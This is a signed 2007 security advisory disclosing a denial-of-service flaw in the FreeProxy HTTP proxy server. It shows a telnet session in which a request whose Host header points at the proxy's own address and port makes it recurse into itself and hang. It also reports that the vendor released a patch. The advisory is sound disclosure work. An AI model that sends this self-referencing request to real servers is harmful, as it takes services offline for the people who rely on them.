-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Nth Dimension Security Advisory (NDSA20070206)
Date: 6th February 2007
Author: Tim Brown <mailto:timb@nth-dimension.org.uk>
URL: <http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>
Product: FreeProxy 3.81/1511 (built 10-10-2004 @19:46:16) <http://www.handcraftedsoftware.org/>
Vendor: Hand Crafted Software <http://www.handcraftedsoftware.org/>
Risk: Medium

Summary

The FreeProxy HTTP proxy server is vulnerable to denial of service.

Technical Details

The FreeProxy HTTP proxy server hangs when it receives a request is made for the
for the hostname/portnumber combination in use by the server itself, like so:

$ telnet 10.0.0.1 8080
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.
GET / HTTP/1.0
Host: 10.0.0.1:8080


Connection closed by foreign host.

The threads spike as it recursively connects to itself, then fall as each
thread times out waiting on the next, then the controlling threads themselves
appear to hang.  The OS will accept the connection (the usual 3 way handshake), but the server will not respond to any requests.

Solutions

Following vendor notification on the 16th January 2007, the vendor promptly
responded with a patched version which fixed this issue.  This was released
as build 1626 on the 24th January 2007.  Nth Dimension would recommend
upgrading to this version or later.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFFyQjwVAlO5exu9x8RAg4+AKCaUM2cg0oPhI4fu8H+r15zB/KAvwCgvsPj
00Zu6z04nvSSfnWUQONKaGc=
=gaWI
-----END PGP SIGNATURE-----